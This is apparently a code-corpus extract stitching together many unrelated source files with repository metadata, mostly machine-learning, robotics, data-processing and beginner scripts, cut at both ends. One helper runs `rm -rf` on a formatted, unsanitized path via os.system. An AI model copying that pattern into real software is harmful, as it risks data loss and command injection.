scene_file, run_iter, True, CONFIG): break return state, flag def select_target_point(state, target_pt_num=1024): """get target point cloud from scene point cloud """ point_state = state[0][0] target_mask = get_target_mask(point_state) point_state = point_state[:4, target_mask] gripper_pc = point_state[:4, :6] point_num = min(point_state.shape[1], target_pt_num) obj_pc = regularize_pc_point_count(point_state.T, point_num, False).T point_state = np.concatenate((gripper_pc, obj_pc), axis=1) return [(point_state, state[0][1])] + state[1:] def gaddpg_action(gaddpg, state, action, episode_steps, max_steps, curr_joint, return_goal=False): """apply GA-DDPG action """ state = select_target_point(state) if state[0][0].shape[1] > 0: gaddpg_remain_step = max(min(max_steps-episode_steps + 1, 30), 1) print('use gaddpg remaining step: {}...'.format(gaddpg_remain_step)) action, _, _, aux_pred = gaddpg.select_action(state, remain_timestep=gaddpg_remain_step, curr_joint=curr_joint) if return_goal: return action, aux_pred return action return np.zeros(6), np.ones(7) * 0.01 class PandaTaskSpace6D(): def __init__(self): self.high = np.array([0.1, 0.1, 0.1, np.pi/6, np.pi/6, np.pi/6]) self.low = np.array([-0.1, -0.1, -0.1, -np.pi/6, -np.pi/6, -np.pi/6]) self.shape = [6] self.bounds = np.vstack([self.low, self.high]) class RobotMLP(nn.Module): """ simple Pointnet-Like MLP """ def __init__(self, in_channels, out_channels, dim=1, gn=False, gn_num=16): super(RobotMLP, self).__init__() if dim == 1: conv = nn.Conv1d if gn: bn = lambda k: nn.GroupNorm(gn_num, k) else: bn = nn.BatchNorm1d else: raise ValueError if not isinstance(out_channels, (list, tuple)): out_channels = [out_channels] layers = [] for oc in out_channels: layers.extend([ conv(in_channels, oc, 1), bn(oc), nn.ReLU(True), ]) in_channels = oc self.layers = nn.Sequential(*layers) def forward(self, inputs, masks=None): inp_shape = inputs.shape inputs = inputs.view(-1, inputs.shape[-2], inputs.shape[-1]) x = self.layers(inputs) x = 
torch.max(x, 2, keepdim=True)[0] x = x.view(len(x), -1) return x def clean_dir(dst_dir): if os.path.exists(dst_dir): os.system('rm -rf {}/*'.format(dst_dir)) def get_usage_and_success(): """Get gpu and memory usages as well as current performance """ GPUs = GPUtil.getGPUs() memory_usage = psutil.virtual_memory().percent gpu_usage = max([GPU.memoryUsed for GPU in GPUs]) return memory_usage, gpu_usage def get_model_path(output_dir, name, env_name, surfix): actor_path = "{}/{}_actor_{}_{}".format( output_dir, name, env_name, surfix ) critic_path = "{}/{}_critic_{}_{}".format( output_dir, name, env_name, surfix ) traj_feat_path = "{}/{}_traj_feat_{}_{}".format( output_dir, name, env_name, surfix ) traj_sampler_path = "{}/{}_traj_sampler_{}_{}".format( output_dir, name, env_name, surfix ) state_feat_path = "{}/{}_state_feat_{}_{}".format( output_dir, name, env_name, surfix ) return actor_path, critic_path, traj_feat_path, traj_sampler_path, state_feat_path def count_parameters(model): return sum(p.numel() for p in model.parameters() if p.requires_grad) def get_loss_info_dict(): return { 'bc_loss': deque([0], maxlen=50), 'policy_grasp_aux_loss': deque([0], maxlen=50), 'critic_gaddpg_loss': deque([0], maxlen=100), 'critic_loss': deque([0], maxlen=100), 'kl_loss': deque([0], maxlen=50), 'sampler_grasp_aux_loss': deque([0], maxlen=50), 'sampler_bc_loss': deque([0], maxlen=50), 'traj_latent_loss': deque([0], maxlen=50), 'gaddpg_loss': deque([0], maxlen=50), 'reward_mask_num': deque([0], maxlen=5), 'expert_reward_mask_num': deque([0], maxlen=5), 'value_mean': deque([0], maxlen=5), 'return_mean': deque([0], maxlen=5), 'gaddpg_pred_mean': deque([0], maxlen=5), 'traj_grad': deque([0], maxlen=5), 'traj_param': deque([0], maxlen=5), 'policy_param': deque([0], maxlen=5), 'sampler_mean': deque([0], maxlen=5), 'traj_num': deque([0], maxlen=5), 'sampler_logsigma': deque([0], maxlen=5), 'policy_grad': deque([0], maxlen=5), 'feat_grad': deque([0], maxlen=5), 'feat_param': deque([0], 
maxlen=5), 'val_feat_grad': deque([0], maxlen=5), 'val_feat_param': deque([0], maxlen=5), 'critic_grad': deque([0], maxlen=5), 'critic_param': deque([0], maxlen=5), 'train_batch_size': deque([0], maxlen=5), } def flip(x, dim): indices = [slice(None)] * x.dim() indices[dim] = torch.arange(x.size(dim) - 1, -1, -1, dtype=torch.long, device=x.device) return x[tuple(indices)] def create_bottleneck(input_size, latent_size): logmu = nn.Linear(input_size, latent_size) logvar = nn.Linear(input_size, latent_size) return nn.ModuleList([logmu, logvar]) def get_policy_class(policy_net_name, args): policy = getattr(core.networks, policy_net_name)( args.num_inputs, args.action_dim, args.hidden_size, args.action_space, extra_pred_dim=args.extra_pred_dim, config=args, ).to('cuda') policy_optim = Adam( policy.parameters(), lr=args.lr, eps=1e-5, weight_decay=1e-5 ) policy_scheduler = torch.optim.lr_scheduler.MultiStepLR( policy_optim, milestones=args.policy_milestones, gamma=args.lr_gamma) policy_target = getattr(core.networks, policy_net_name)( args.num_inputs, args.action_dim, args.hidden_size, args.action_space, extra_pred_dim=args.extra_pred_dim, config=args, ).to('cuda') return policy, policy_optim, policy_scheduler, policy_target def get_critic(args): model = core.networks.ResidualQNetwork if has_check(args, 'dense_critic') else core.networks.QNetwork critic = model( args.critic_num_input, args.critic_value_dim, args.hidden_size, extra_pred_dim=args.critic_extra_pred_dim, ).cuda() critic_optim = Adam( critic.parameters(), lr=args.value_lr, eps=1e-5, weight_decay=1e-5 ) critic_scheduler = torch.optim.lr_scheduler.MultiStepLR( critic_optim, milestones=args.value_milestones, gamma=args.value_lr_gamma, ) critic_target = model( args.critic_num_input, args.critic_value_dim, args.hidden_size, extra_pred_dim=args.critic_extra_pred_dim, ).cuda() return critic, critic_optim, critic_scheduler, critic_target
liruiw/HCG
core/utils.py
utils.py
py
48,148
python
en
code
13
github-code
36
24593511416
# 4. Write a program that converts some amount of money from USD to BYN, # ask a user for the amount, store the ratio inside the program itself. usd = input("Enter the amount in US dollars:\n ") try: usd = float(usd) except ValueError: print("Data entry error.") exit() exchange_rates = 3.05 byn = usd * exchange_rates print(f"{usd} US dollars are equal {byn} Belarusian rubles")
MikitaTsiarentsyeu/Md-PT1-69-23
Tasks/Voltov/Task1/task4.py
task4.py
py
392
python
en
code
0
github-code
36
10353313162
import streamlit as st import pickle model_random = pickle.load(open("model/forest.pkl", "rb")) from utils import head, body hasil = head() if st.button("Submit"): name, MDVP_FO,MDVP_FHI, MDVP_FloHz,MDVP_JitterPercent,MDVP_JitterAbs, MDVP_RAP, MDVP_PPQ,Jitter_DDP,MDVP_Shimmer,MDVP_ShimmerDb,Shimmer_APQ3, Shimmer_APQ5, MDVP_APQ,Shimmer_DDA,NHR, HNR, RPDE, DFA, spread1,spread2, D2, PPE = hasil input_model = [[MDVP_FO,MDVP_FHI, MDVP_FloHz,MDVP_JitterPercent,MDVP_JitterAbs, MDVP_RAP, MDVP_PPQ,Jitter_DDP,MDVP_Shimmer,MDVP_ShimmerDb,Shimmer_APQ3, Shimmer_APQ5, MDVP_APQ,Shimmer_DDA,NHR, HNR, RPDE, DFA, spread1,spread2, D2, PPE]] hasil_prediksi = model_random.predict(input_model)[0] status = {0:"Healthy", 1:"Parkinsson"} body("Result : "+ " " + name + " current status is " + status[hasil_prediksi])
FathanKhansaArby/FinalProject083
app/main.py
main.py
py
833
python
en
code
0
github-code
36
70987576744
#!/usr/bin/python2.7 import rospy from sensor_msgs.msg import Image import cv2 from cv_bridge import CvBridge bridge = CvBridge() def show_webcam(): cam = cv2.VideoCapture(0) if not cam.isOpened(): raise IOError("Cannot open webcam") while True: ret_val, img = cam.read() cv2.imshow("webcam", img) img_message = bridge.cv2_to_imgmsg(img, encoding="passthrough") pub.publish(img_message) key = cv2.waitKey(1) if key == 27: break cam.release() cv2.destroyAllWindows() pub = rospy.Publisher("/usb_cam/image_raw", Image, queue_size=1) rospy.init_node("img_publisher", anonymous=True) show_webcam() '''rate = rospy.Rate(1) while not rospy.is_shutdown(): img = cv2.imread("/home/wout/Pictures/arucotest.jpg") img_message = bridge.cv2_to_imgmsg(img, encoding="passthrough") pub.publish(img_message) rate.sleep() '''
E-pep/HaldisBot
catkin_ws/src/Line_Follower_pkg/imgPub.py
imgPub.py
py
924
python
en
code
1
github-code
36
21165644420
#!/usr/bin/env python3 # -*- coding: utf-8 -*- from matrix import * from rand import rand_normal class Dense: """全连接层 Args: input_num: 输入节点数 units: 输出节点数 Attributes: inputs: 输入 inputs_grad: 输入的梯度 units: 输出节点数 kernel: 权值 kernel_grad: 权值的梯度 bias: 偏置 bias_grad: 偏置的梯度 lr: 学习率 y: 输出 """ def __init__(self, input_num, units): self.inputs = None self.inputs_grad = None self.units = units self.kernel = reshape([x / 10 for x in rand_normal(input_num * units)], input_num, units) self.kernel_grad = [[0] * units for _ in range(input_num)] self.bias = [0] * units self.bias_grad = [0] * units self.lr = 0 self.y = None def forward(self, inputs): """前向传播 Args: inputs: 输入 Returns: 前向传播时层的输出 """ self.inputs = inputs self.inputs_grad = inputs self.y = accord(dot(inputs, self.kernel), [self.bias] * len(inputs), '+') return self.y def backward(self, delta): """反向传播,并执行参数更新 Args: delta: 误差 Returns: 输入的梯度 """ self.bias_grad = each(sum_axis(delta, axis=0), lambda x: x / len(delta)) self.kernel_grad = each(dot(transpose(self.inputs), delta), lambda x: x / len(delta)) self.inputs_grad = dot(delta, transpose(self.kernel)) self.kernel = accord(self.kernel, each(self.kernel_grad, lambda x: -1 * x * self.lr), '+') self.bias = accord(self.bias, each(self.bias_grad, lambda x: -1 * x * self.lr), '+') return self.inputs_grad class Sigmoid: """Sigmoid激活层 Attributes: inputs: 输入 inputs_grad: 输入的梯度 y: 输出 """ E = 2.71828182846 def __init__(self): self.inputs = None self.inputs_grad = None self.y = [] @staticmethod def _sigmoid(inputs): """sigmoid函数 f(x) = 1 / (1 + exp(-x)) Args: inputs: 输入自变量 Returns: sigmoid计算的结果 """ return each(inputs, lambda x: 1 / (1 + __class__.E ** (-1 * x))) def forward(self, inputs): """前向传播 Args: inputs: 输入 Returns: 输出 """ self.inputs = inputs self.inputs_grad = inputs self.y = __class__._sigmoid(inputs) return self.y def backward(self, delta): """反向传播 Args: delta: 误差 Returns: 输入的梯度 """ sig = __class__._sigmoid(self.inputs) self.inputs_grad = accord(delta, accord(sig, each(sig, 
lambda x: 1 - x), '*'), '*') return self.inputs_grad class L2Loss: """平方损失层 Attributes: pred: 预测值(每个分类的确信度) pred_grad: 预测值的梯度 label: 标签(标记的每个分类的确信度) loss: 损失值 """ def __init__(self): self.pred = None self.pred_grad = None self.label = None self.loss = 0 def forward(self, pred, target): """前向传播 Args: pred: 预测值 target: 目标(是哪个分类) Returns: 损失值 """ self.pred = pred self.pred_grad = pred self.label = reshape([0] * len(pred) * len(pred[0]), len(pred), len(pred[0])) for a, b in zip(self.label, target): a[b] = 1 self.loss = sum(sum_axis(each(accord(pred, self.label, '-'), lambda x: x ** 2), axis=0)) / (2 * len(pred)) return self.loss def backward(self): """反向传播 Returns: 预测值的梯度 """ self.pred_grad = each(accord(self.pred, self.label, '-'), lambda x: x / len(self.pred)) return self.pred_grad
straicat/data-mining-assignment
layer.py
layer.py
py
4,131
python
en
code
0
github-code
36
7998654007
def Theory(): t = str(input("이론값을 입력해주십시오 : ")) if not isfloat(t) or float(t) <= 0: return Theory() else: return float(t) def Experiment(): e = str(input("실험값을 입력해주십시오 : ")) if not isfloat(e) or float(e) < 0: return Experiment() else: return float(e) def isfloat(s): (m,_,n) = s.partition(".") return (m.isdigit() and (n.isdigit() or n=="")) or m=="" and n.isdigit() def main(): print("오차율 계산 프로그램입니다.") r1 = Theory() r2 = Experiment() result = abs(r1-r2)/r1 * 100 print("오차율은 " + str(round(result,4)) + "%입니다.") a = str(input("더 계산해드릴까요?(Y를 치시면 다시, 다른 문자를 치시면 프로그램이 종료됩니다.) : ")) if a == "Y": main() else: print("안녕히가세요") main()
kyj0701/SoftWare2017
error.py
error.py
py
822
python
ko
code
0
github-code
36
15975975433
# *-* coding: utf-8 *-* """ Created on sam 22 mai 2021 19:11:56 CEST @author : vekemans """ import numpy as np from numpy.fft import \ rfft,irfft,fftfreq,\ rfft2,irfft2,rfftfreq from scipy import sparse from scipy.interpolate import interp2d import matplotlib import matplotlib.pyplot as plt nfig = 1 import cahn_hilliard as ch import cahn_hilliard_sd as chs range_n = 2**np.arange(2,11) error_fd = np.zeros(range_n.shape) error_rk4 = np.zeros(range_n.shape) error_bdf_ab = np.zeros(range_n.shape) n_ref = 2*range_n[-1] time = 1e-4 # c0 = np.random.random(n_ref*n_ref)*2 -1 # c0 = c0.reshape((n_ref,n_ref)) c0 = np.ones((n_ref,n_ref)) c0[:n_ref//4,:] = -1 c0[3*n_ref//4:,:] = -1 c0[:,:n_ref//4] = -1 c0[:,3*n_ref//4:] = -1 sim = iter(chs.simulate(c0,n_ref,time)) next(sim); sol = next(sim) x = np.arange(0,1,step=1/n_ref) # c0_interpolation = interp2d(x,x,c0, kind='cubic') sol_interpolation = interp2d(x,x,sol, kind='linear') for i,n in enumerate(range_n): x = np.arange(0,1,step=1/n)[:n] # c0 = c0_interpolation(x,x) c0 = np.ones((n,n)) c0[:n//4,:] = -1 c0[3*n//4:,:] = -1 c0[:,:n//4] = -1 c0[:,3*n//4:] = -1 sim = iter(ch.simulate(c0.flatten(),n,time)) next(sim); guess = next(sim) error_fd[i] = ((guess-sol_interpolation(x,x))**2).mean()**0.5 sim = iter(chs.simulate(c0,n,time,temp_scheme='rk4')) next(sim); guess = next(sim) error_rk4[i] = ((guess-sol_interpolation(x,x))**2).mean()**0.5 sim = iter(chs.simulate(c0,n,time)) next(sim); guess = next(sim) error_bdf_ab[i] = ((guess-sol_interpolation(x,x))**2).mean()**0.5 fig = plt.figure(nfig) plt.plot(range_n,error_fd,ls='-',marker='o',markersize=8, label='FD EE') plt.plot(range_n,error_rk4,ls=':',marker='v',markersize=8, label='Spectral RK4') plt.plot(range_n,error_bdf_ab,ls='--',marker='^',markersize=8, label='Spectral BDF/AB') # plt.xticks([2,4,6,8,10],labels=[r'$2^{%d}$' %i for i in [2,4,6,8,10]]) plt.legend(loc='best'); plt.xscale('log', base=2); plt.yscale('log') plt.xlabel('n'); plt.ylabel(r'L2 norm error at $t=10^{%d}$ [s]' 
%(round(np.log(time)/np.log(10)))) plt.grid(which='major',axis='both',color='xkcd:grey',linestyle='--',linewidth=0.8) plt.grid(which='minor',axis='y',color='xkcd:grey',linestyle='--',linewidth=0.8) fig.tight_layout() print(np.log(error_bdf_ab[-2]/error_bdf_ab[-1])/np.log(2)) fig.savefig('../figs/convergence.pdf') plt.show()
abbarn/lmeca2300
project/pylib/convergence.py
convergence.py
py
2,416
python
en
code
0
github-code
36
38688339389
import torch from utils.metrics import AURC import numpy as np from utils.measures import MSP def centralize(y:torch.tensor): return y-(y.mean(-1).view(-1,1)) def p_norm(y:torch.tensor,p, eps:float = 1e-12): if p is None or p == 0: return torch.ones(y.size(0),1,device=y.device) else: return y.norm(p=p,dim=-1).clamp_min(eps).view(-1,1) def beta_heuristic(y:torch.tensor,p): if p==0 or p is None: return 1 return (p_norm(y,p).mean()) def beta_generalized_mean(n,p): if p==0 or p is None: return 1 else: return (n*np.math.factorial(p))**(1/p) def pNormSoftmax(y:torch.tensor,p,beta= None, out = 'MSP'): '''Implement pNormSoftmax (centralize the logits, p-normalize, scale by beta and apply MSP). If beta is None, defines beta as the heuristic beta (mean of the p-norms). If out is passes as 'logits', return the normalized logits (skip MSP)''' y = centralize(y) norm = p_norm(y,p) if beta is None: beta = norm.mean() if out == 'logits': return y.mul(beta).div(norm) else: return MSP(y.mul(beta).div(norm)) class optimize: '''Gradient methods could be used, but a grid search on a small set of p's show to be strongly efficient for pNormSoftmax optimization. 
Also, AURC and AUROC are not differentiable''' p_range = torch.arange(8) T_range = torch.arange(0.01,2,0.01) @staticmethod def p_and_beta(logits,risk,metric = AURC,p_range = p_range,T_range =T_range): vals = optimize.p_T_grid(logits,risk,metric,p_range,T_range) p,T = np.unravel_index(np.argmin(vals),np.shape(vals)) p = p_range[p] T = T_range[T] return p,beta_heuristic(logits,p)/T @staticmethod def p(logits, risk,metric = AURC,p_range = p_range, heuristic = True): if heuristic: beta = None else: beta = 1.0 vals = optimize.p_grid(logits,risk,metric,p_range, beta) p = p_range[np.argmin(vals)] return p @staticmethod def T(logits, risk,metric = AURC,T_range = T_range): vals = optimize.T_grid(logits,risk,metric,T_range) return T_range[np.argmin(vals)] @staticmethod def T_grid(logits,risk,metric = AURC,T_range = T_range): vals = [] for T in T_range: vals.append(metric(risk,MSP(logits.div(T))).item()) return vals @staticmethod def p_grid(logits,risk,metric = AURC,p_range = p_range, beta = None): vals = [] for p in p_range: vals.append(metric(risk,pNormSoftmax(logits,p,beta)).item()) return vals @staticmethod def p_T_grid(logits,risk,metric = AURC,p_range = p_range,T_range = T_range): vals = [] for p in p_range: vals_T = optimize.T_grid(pNormSoftmax(logits,p,None,'logits'),risk,metric,T_range) vals.append(vals_T) return vals @staticmethod def T_fromloss(logits,labels,loss = torch.nn.CrossEntropyLoss(),T_range = T_range): vals = optimize.T_grid_fromloss(logits,labels,loss,T_range) return T_range[np.argmin(vals)] @staticmethod def T_grid_fromloss(logits,labels,loss = torch.nn.CrossEntropyLoss(),T_range = T_range): vals = [] for T in T_range: vals.append(loss(logits.div(T),labels).item()) return vals def optimal_pNormSoftmax(z:torch.tensor,risk:torch.tensor,metric = AURC,optimize_beta = False,**kwargs): if optimize_beta: p,beta = optimize.p_and_beta(z,risk,metric,**kwargs) else: p = optimize.p(z, risk,metric, **kwargs) beta = beta_heuristic(z,p) return pNormSoftmax(z,p,beta)
lfpc/pNormSoftmax
pNormSoftmax.py
pNormSoftmax.py
py
3,632
python
en
code
1
github-code
36
74457197862
import json import os import sys import time from apscheduler.schedulers.blocking import BlockingScheduler from public import redis_con,get_conn from data_change import get_setting # 将数据查询到redis中 def get_data(): con = get_conn() cur = con.cursor() sql = f"SELECT id,title,Ncontent from {get_setting()} where is_change=0 LIMIT 50000" num = cur.execute(sql) results = cur.fetchall() if num != 0: for res in results: res = json.dumps(list(res)) redis_con().lpush('data_all',res) return True return False def chat(): if redis_con().exists('data_all') == 1: if redis_con().llen('data_all') < 5000: result = get_data() if result is True: print('更新数据成功') print(f"总数据{redis_con().llen('data_all')}") return True print(f"总数据{redis_con().llen('data_all')}") result = get_data() if result is True: print('更新数据成功') print(f"总数据{redis_con().llen('data_all')}") return True return False if __name__ == '__main__': # scheduler = BlockingScheduler() # scheduler.add_job(chat, 'cron', minute =1,timezone='Asia/Shanghai') # scheduler.start() # # chat() while True: res = chat() if res is False: sys.exit(0) # 终止运行 time.sleep(3600)
AYongmengnan/zimeiti
zimeiti/get_data_redis.py
get_data_redis.py
py
1,434
python
en
code
0
github-code
36
35376239294
# time-dependent solutions for P_00(t), P_01(t), and P_10(t) and P_01(t) # taken from Anderson 2017 Lecture Notes on Stochastic Processes with Applications in Biology # P_00(t) is the chance of being in the inactive state at t=t, given being in the inactive state at t=0 # or P_00(t) = P(x_t = 0 | x_0 = 0) with x=0 is being inactive and x=1 is being inactive # restrictions P_00(t) + P_01(t) = 1 # and P_10(t) + P_11(t) = 1 import numpy as np import matplotlib.pyplot as plt def p_00(k_on, k_off, t): la = k_on mu = k_off ret_val = mu/(mu + la) + la/(mu + la) * np.exp(-(mu + la)*t) return ret_val def p_10(k_on, k_off, t): la = k_on mu = k_off ret_val = mu/(mu + la) - mu/(mu + la) * np.exp(-(mu + la)*t) return ret_val def create_transition_chances(k_on, k_off): wins = [j*15 for j in range(0, 9)] p_00s = [] p_10s = [] for t in wins: p_00s.append(p_00(k_on, k_off, t)) p_10s.append(p_10(k_on, k_off, t)) p_01s = [1 - p for p in p_00s] p_11s = [1 - p for p in p_10s] return wins, (p_00s, p_10s, p_01s, p_11s) def plot_transition_chances(k_on, k_off, wins, p_00s, p_10s, p_01s, p_11s): plt.plot(wins, p_00s, 'o-', label="P_00") plt.plot(wins, p_10s, 'o-', label="P_10") plt.plot(wins, p_01s, 'o-', label="P_01") plt.plot(wins, p_11s, 'o-', label="P_11") title = "k_on={k_on};k_off={k_off}. Chances of being in state x_t given state x_0," \ " with e.g. P_00 = P(x_t=0 | x_0=0)".\ format(k_on=k_on, k_off=k_off) plt.title(title) plt.ylim(0, 1) plt.legend() plt.xlabel("time in minutes") plt.ylabel("chance") plt.show() plt.close(1) k_on = 0.01 k_off = 0.04 wins, (p_00s, p_10s, p_01s, p_11s) = create_transition_chances(k_on=k_on, k_off=k_off) plot_transition_chances(k_on, k_off, wins, p_00s, p_10s, p_01s, p_11s)
resharp/scBurstSim
solution/nonstat_markov.py
nonstat_markov.py
py
1,894
python
en
code
3
github-code
36
932629353
import datetime from neutron.common import rpc as proxy from neutron.openstack.common import log as logging LOG = logging.getLogger(__name__) class HeloAgentNotifyAPI(proxy.RpcProxy): """API for plugin to ping agent.""" BASE_RPC_API_VERSION = '1.0' def __init__(self, topic=None, version=None): if version: super(HeloAgentNotifyAPI, self).__init__( topic=topic, default_version=version) else: super(HeloAgentNotifyAPI, self).__init__( topic=topic, default_version=self.BASE_RPC_API_VERSION) def helo_agent_host(self, context, host, topic): """Notify the agent on host.""" data = 0 try: data = self.call( context, self.make_msg('helo', time=datetime.datetime.utcnow()), timeout = 3, topic='%s.%s' % (topic, host)) except Exception: LOG.exception(_("Failed to helo %(topic)s on %(host)s"), {"topic": topic, "host": host}) return data class HeloRpcCallbackMixin(object): def helo(self, context, time): LOG.debug(time) return 1
CingHu/neutron-ustack
neutron/api/rpc/agentnotifiers/helo_rpc_agent_api.py
helo_rpc_agent_api.py
py
1,219
python
en
code
0
github-code
36
22292420863
# 0. 동빈나 책. 1이 될때 까지. # 1. greedy # 2. 빼야한다면 빼고, 나눌수있다면 나누기먼저. # 입력예제 # 17 4 답은 3 n,k=map(int,input().split()) count=0 while 1: temp=(n//k)*k count+=n-temp n=temp if n<k: break count+=1 n//=k count+=n-1 print(count)
98hyun/algorithm
greedy/b_3.py
b_3.py
py
317
python
ko
code
0
github-code
36
69912139304
from ._common import basic_element SCHEMA = { "type": "dict", "required_keys": {"content": {"type": "string", "nullable": True}}, "optional_keys": {"urgent": {"type": "boolean", "default": False}}, } announcement_box = basic_element("announcement_box.html", SCHEMA)
eldridgejm/automata
automata/api/coursepage/elements/announcement_box.py
announcement_box.py
py
281
python
en
code
0
github-code
36
11358969821
import sys sys.stdin = open('일곱난쟁이.txt') def comb(dep=0): global check if check == 1: return if len(arr) == n: tmp = 0 for i in range(n): tmp += arr[i] if tmp == 100: check = 1 for j in sorted(arr): print(j) return if dep == len(info): return for k in range(dep, len(info)): arr.append(info[k]) comb(k+1) arr.pop() info = [] for _ in range(9): info.append(int(input())) check = 0 n = 7 arr = [] comb()
Jade-KR/TIL
04_algo/study/01/일곱난쟁이.py
일곱난쟁이.py
py
564
python
en
code
0
github-code
36
451073459
#!/usr/bin/python3 from .config_utils import get_base_config from .log_utils import get_module_logger import DNS import os import sys import time import validators CDIR = os.path.dirname(os.path.realpath(__file__)) ROOTDIR = os.path.abspath(os.path.join(CDIR, os.pardir)) BASECONFIG = get_base_config(ROOTDIR) LOGGING = get_module_logger(__name__) DNS.defaults['server'] = ['8.8.8.8', '8.8.4.4'] DNS.defaults['timeout'] = 5 def forward_dns_lookup(host_name): """Perform a DNS lookup of a FQDN. Params: - host_name: (type: string) FQDN to perform lookup of. Returns: - result: (type: string) resulting IP address. """ try: ip_list = DNS.dnslookup(host_name, 'A') if len(ip_list) > 0: for ip_addr in ip_list: if validators.ipv4(ip_addr): return ip_addr except BaseException: LOGGING.warning('DNS lookup of {0} failed.'.format(host_name)) return None return None def resolve_dns(host_name): """Perform a DNS lookup of a FQDN. Params: - host_name: (type: string) FQDN to perform lookup of. Returns: - result: (type: string) resulting IP address. """ if validators.ipv4(host_name): return host_name ip_addr = forward_dns_lookup(host_name) if ip_addr is not None: return ip_addr return False
phage-nz/ph0neutria
core/dns_utils.py
dns_utils.py
py
1,379
python
en
code
299
github-code
36
17895276920
from typing import Dict, Mapping, Sequence, Text, Union

import seqio
import tensorflow as tf

AUTOTUNE = tf.data.experimental.AUTOTUNE

# Field names used by the NALUE compositional intent-detection dataset.
NALUE_INPUT_NAME = 'sentence'
NALUE_OUTPUT_NAMES = ('vertical', 'domain', 'intent')

# A T5 text value: a string tensor or a plain Python string.
T5Text = Union[tf.Tensor, Text]


def toxic_comments_preprocessor_binary_classification(
    dataset: tf.data.Dataset,
    label_tokens: Sequence[str] = ('<extra_id_0>', '<extra_id_1>'),
    threshold: float = 0.5) -> tf.data.Dataset:
  """Converts a toxicity detection dataset to classification format.

  Toxicity detection task maps a sentence to a binary class of '<extra_id_0>'
  (non-toxic) and '<extra_id_1>' (toxic). A floating toxicity score (e.g.,
  0.3) will be converted to binary using a threshold.

  For example, a typical example might look like
  {
      'text': 'Some text.',
      'toxicity': 0.3,
  }

  This example would be transformed to
  {
      'inputs': 'Some text.',
      'targets': '<extra_id_0>',
  }

  Args:
    dataset: a tf.data.Dataset containing examples to process.
    label_tokens: Strings indicating the two classes of the binary labels.
      They should correspond to one of the extra tokens in SentencePiece
      tokenizer.
    threshold: the binary threshold for converting a continuous score (e.g.,
      0.3) to toxicity label.

  Returns:
    A mapped toxicity detection dataset in text2text format.
  """
  label_tokens = tf.constant(label_tokens)

  def _map_fn(ex: Mapping[str, tf.Tensor]) -> Mapping[str, tf.Tensor]:
    # A score above the threshold selects index 1 (the toxic label token).
    label_index = tf.cast(ex['toxicity'] > threshold, tf.int32)
    label_string = tf.gather(label_tokens, label_index)
    return {'inputs': ex['text'], 'targets': label_string}

  return dataset.map(_map_fn, num_parallel_calls=AUTOTUNE)


def toxic_comments_preprocessor_rank_classification(
    dataset: tf.data.Dataset,
    all_labels: Sequence[str] = ('0', '1'),
    input_feature: str = 'text',
    target_feature: str = 'toxicity',
    threshold: float = 0.5) -> tf.data.Dataset:
  """Reformats toxicity dataset to use rank classification preprocessor.

  Adapted from privacy.research.hark.t5.preprocessors.binary_classification.

  In this method, we convert examples having a `text` and a `toxicity` feature
  to a format that is subsequently consumed by a rank classification
  formatter. The `rank_classification_formatter` in T5 preprocessors then
  consumes the output features and creates two examples with `inputs` as input
  and each of `choice1` and `choice2` as targets. Each combination is then
  scored given the ground-truth `label`.

  Input data format:
  {
      'text': 'Some text.',
      'toxicity': 0.3,
  }

  This function will return example of the format:
  {
      'inputs': 'Some text.',
      'choice1': '0',
      'choice2': '1',
      'label': 0
  }

  Args:
    dataset: A dataset to process.
    all_labels: Strings indicating the two classes of the binary labels.
    input_feature: Input feature name.
    target_feature: Target feature name.
    threshold: the binary threshold for converting a continuous score (e.g.,
      0.7) to toxicity label.

  Returns:
    A dataset preprocessed with the format listed above.
  """

  def _map_fn(ex: Mapping[str, tf.Tensor]) -> Mapping[str, tf.Tensor]:
    return {
        'inputs': ex[input_feature],
        'choice1': tf.constant(all_labels[0], dtype=tf.string),
        'choice2': tf.constant(all_labels[1], dtype=tf.string),
        'label': tf.cast(ex[target_feature] > threshold, dtype=tf.int32)
    }

  return dataset.map(_map_fn, num_parallel_calls=tf.data.experimental.AUTOTUNE)


def make_intent_to_token_map(intent_names: Sequence[str],
                             intent_tokens: Sequence[str],
                             unk_token: str) -> tf.lookup.StaticHashTable:
  """Creates a StaticHashTable that maps intent names to special tokens.

  Different from Dict, the StaticHashTable supports value-based key lookup
  based on a tf.Tensor string, which is important for working with
  tf.data-based input processors.

  Args:
    intent_names: A sequence of possible intent names.
    intent_tokens: A sequence of SentencePiece tokens corresponding to the
      intent names.
    unk_token: The token for unknown vocabulary values.

  Returns:
    A StaticHashTable that maps intent_names to special tokens in the format
    of '<extra_id_X>' where X is an integer.
  """
  mapping_initializer = tf.lookup.KeyValueTensorInitializer(
      keys=tf.constant(intent_names), values=tf.constant(intent_tokens))
  intent_to_token_mapping = tf.lookup.StaticHashTable(
      mapping_initializer, default_value=tf.constant(unk_token))

  return intent_to_token_mapping


def tokenize_compositional_intents(
    example: Mapping[str, tf.Tensor],
    intent_to_token_map: tf.lookup.StaticHashTable,
    separator: str = ' ') -> tf.string:
  """Converts an intent tuple into a string of special tokens.

  This function extracts intent names from an example with fields listed in
  NALUE_OUTPUT_NAMES (e.g., "vertical", "domain", "intent"), converts them
  into special tokens and then concatenates them into a string. For example:

  Input data format:
  {
      'vertical': 'Answers',
      'domain': 'Dictionary',
      'intent': 'Translate'
  }

  We will then extract the intent names 'Answers', 'Dictionary', 'Translate'
  and convert them into special tokens using intent_to_token_map.

  Output data format:  '<token_1> <token_2> <token_3>'.

  where `<token_X>` are the tokens corresponding to the names 'Answers',
  'Dictionary', 'Translate' as defined in intent_to_token_map.

  Args:
    example: An input example with fields ('vertical', 'domain', 'intent').
    intent_to_token_map: A StaticHashTable that maps intent name to the
      corresponding special token.
    separator: The string separator that is used to join special tokens into
      a string.

  Returns:
    A string with format '<token_1> <token_2> <token_3>'.
  """
  intent_tokens = []

  # Extracts intent_name, and convert them into intent_tokens.
  for output_field in NALUE_OUTPUT_NAMES:
    intent_name = example[output_field]
    # StaticHashTable supports subscripting; this is a table lookup.
    intent_token = intent_to_token_map[intent_name]
    intent_tokens.append(intent_token)

  return tf.strings.reduce_join(intent_tokens, separator=separator)


@seqio.map_over_dataset
def nalue_preprocessors_classification(
    example: Mapping[str, tf.Tensor],
    intent_to_token_map: tf.lookup.StaticHashTable) -> Dict[str, tf.Tensor]:
  """Preprocess NALUE examples into text2text format.

  Input data format:
  {
      'sentence': 'some sentence'.
      'vertical': 'Answers',
      'domain': 'Dictionary',
      'intent': 'Translate'
  }

  This function will convert the intent names in ('vertical', 'domain',
  'intent') into corresponding singular tokens for
  seqio.SentencePieceVocabulary() (e.g., a sentence piece that will be
